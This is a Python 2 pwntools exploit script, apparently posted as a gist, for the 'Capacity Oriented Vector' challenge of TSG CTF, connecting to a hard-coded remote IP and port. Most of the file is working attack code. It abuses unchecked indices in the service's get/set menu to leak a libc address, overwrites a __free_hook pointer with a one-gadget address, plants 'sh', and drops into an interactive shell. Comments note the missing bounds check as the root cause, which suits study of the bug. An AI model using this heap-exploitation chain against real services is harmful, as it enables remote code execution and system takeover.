@hama7230
Last active May 5, 2019 10:05
TSG CTF Capacity Oriented Vector
#!/usr/bin/env python
from pwn import *

# Target binary under analysis; its architecture drives the pwntools context.
elf = ELF('./vector')
context(os='linux', arch=elf.arch)

# Terminal used for the debugger window (see the 'd' / 'a' options below).
context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window
# context(log_level='debug')  # output verbose log
# libc = ELF('')

# Endpoints selected by the first CLI argument: 'r' (remote) or 'l' (local).
RHOST, RPORT = "34.97.74.235", 30001
LHOST, LPORT = "127.0.0.1", 30001
def section_addr(name, elf=elf):
    """Return the virtual address (``sh_addr``) of ELF section *name*.

    *elf* defaults to the module-level ELF loaded above. Not called anywhere
    in this script; kept as a general helper.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log the value of the expression/name *ss* in hex, e.g. ``libc_base: 0x7f...``.

    *ss* is passed to eval(), so it must be a literal written in this script
    (the single call site passes 'libc_base'); never feed it data received
    from the remote side.
    """
    value = eval(ss)
    message = "%s: 0x%x" % (ss, value)
    log.info(message)
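# Connection setup. The first CLI argument (consumed here) picks the target:
#   r = remote service at RHOST:RPORT, l = local service at LHOST:LPORT,
#   d = run ./vector under gdb with `gdbscript`, a = run locally and attach gdb,
#   anything else (or no argument) = plain local process.
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
# Tuple membership rather than `opt in 'rl'`: the substring test also
# accepted '' and 'rl', which then raised KeyError on the endpoint lookup.
if opt in ('r', 'l'):
    endpoints = {'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}
    conn = remote(*endpoints[opt])
elif opt == 'd':
    # The template contains no '{}' placeholder, so the format() argument
    # (main's address, or the entry point when there is no main symbol) is
    # currently unused; it is kept for a breakpoint line to be added later.
    gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols else elf.entrypoint))
    conn = gdb.debug(['./vector'], gdbscript=gdbscript)
else:
    conn = process(['./vector'])
    # conn = process(['./vector'], env={'LD_PRELOAD': ''})
    if opt == 'a':
        gdb.attach(conn)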
def new(name):
    """Menu option 1: create a new vector called *name* (sent as its str())."""
    replies = (('> ', '1'), ('name:', str(name)))
    for prompt, reply in replies:
        conn.sendlineafter(prompt, reply)
def concat(s1, s2, d):
    """Menu option 2: concatenate vectors *s1* and *s2* into vector *d*.

    The service prompts for three names in turn; each is sent as its str().
    """
    conn.sendlineafter('> ', '2')
    for vec in (s1, s2, d):
        conn.sendlineafter('name:', str(vec))
def push(name, val):
    """Menu option 3: append *val* to vector *name* (both sent as str())."""
    replies = (('> ', '3'), ('name:', str(name)), ('value:', str(val)))
    for prompt, reply in replies:
        conn.sendlineafter(prompt, reply)
def set(name, idx, val):
    """Menu option 4: store *val* at index *idx* of vector *name*.

    Shadows the builtin set(); the name is kept because the script calls it.
    Nothing on this side validates *idx* — only the service's own check, if
    any, decides whether the write lands inside the vector.
    """
    replies = (
        ('> ', '4'),
        ('name:', str(name)),
        ('index:', str(idx)),
        ('value:', str(val)),
    )
    for prompt, reply in replies:
        conn.sendlineafter(prompt, reply)
def get(name, idx):
    """Menu option 5: request the element at index *idx* of vector *name*.

    Only sends the request; the caller reads the ' val: ' reply line from
    ``conn`` itself.
    """
    replies = (('> ', '5'), ('name:', str(name)), ('index:', str(idx)))
    for prompt, reply in replies:
        conn.sendlineafter(prompt, reply)
# exploit
# NOTE: the steps below are order-sensitive; each call drives one menu action
# on the service and the later hard-coded indices assume this exact sequence.
# From a defensive standpoint the visible root cause is that get()/set()
# accept any index: vector 2 is never pushed to in this script, yet it is
# read and written far beyond index 0 below. A bounds check on the index in
# the service would stop both the read and the writes.
log.info('Pwning')
new(1)
new(2)
new(0)
# Twelve self-concatenations of vector 0 (presumably to grow its storage
# before the next vectors are created; the exact effect depends on the service).
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
concat(0, 0, 0)
new(3)
new(4)
# Fill vector 1 with 0x20 entries of 0xff.
for i in range(0x20):
    push(1, 0xff)
# Read six consecutive elements through vector 2, starting at index 0x8c0+4,
# and assemble them little-endian into `leak`. The ' val: ' reply prints each
# element as a signed byte, hence the fold of negatives back into 0..255.
leak = 0
for i in range(6):
    get(2, 0x8c0+4+i)
    conn.recvuntil(' val: ')
    a = int(conn.recvline())
    if a < 0:
        a += 0x100
    leak = leak + (a << (i*8))
print hex(leak)  # Python 2 print statement (the script also uses raw_input below)
# 0x3ebca0 is a hard-coded offset for the target's specific libc build; the
# subtraction is only meaningful against that exact library.
libc_base = leak - 0x3ebca0
dbg('libc_base')
# Author-named free_hook: libc_base plus another build-specific offset, packed
# as 8 little-endian bytes by p64() and written one byte per set() call.
# Python 2: p64() returns str, so free_hook[i] is a 1-char str for ord().
free_hook = p64(libc_base + 0x3ed8e8-4)
for i in range(6):
    set(2, 0x64-8+i, ord(free_hook[i]))
# Byte-wise writes at fixed indices of vector 2. Their meaning depends on the
# service's object layout, which is not visible in this script.
set(2, 4+0x18, 0x00)
set(2, 4+0x18+1, 0x00)
set(2, 4+0x18+2, 0x10)
set(2, 4+0x18+5, 0xff)
set(2, 4+0x18+6, 0xff)
#set(2, 4+0x18+3, 0x10)
set(2, 4+0x38, 0x00)
set(2, 4+0x38+1, 0x00)
set(2, 4+0x38+2, 0x10)
set(2, 4+0x38+3, 0x10)
#new(5)
concat(3, 3, 6)
concat(3, 3, 7)
# The first assignment is dead: it is overwritten on the next line, so only
# libc_base + 0x4f322 is used (again a libc-build-specific offset).
system = p64(libc_base + 0x4f440)
system = p64(libc_base + 0x4f322)
# Push the low six bytes of `system` into vector 7, one byte per call.
for i in range(6):
    push(7, ord(system[i]))
# Overwrite the bytes at 4+0x38.. of vector 2 with 's', 'h', 0.
set(2, 4+0x38, ord('s'))
set(2, 4+0x38+1, ord('h'))
set(2, 4+0x38+2, 0)
# Pause for operator input (e.g. to inspect state under the debugger) before
# the final action. raw_input() is the Python 2 name.
raw_input()
concat(3, 3, 3)
conn.interactive()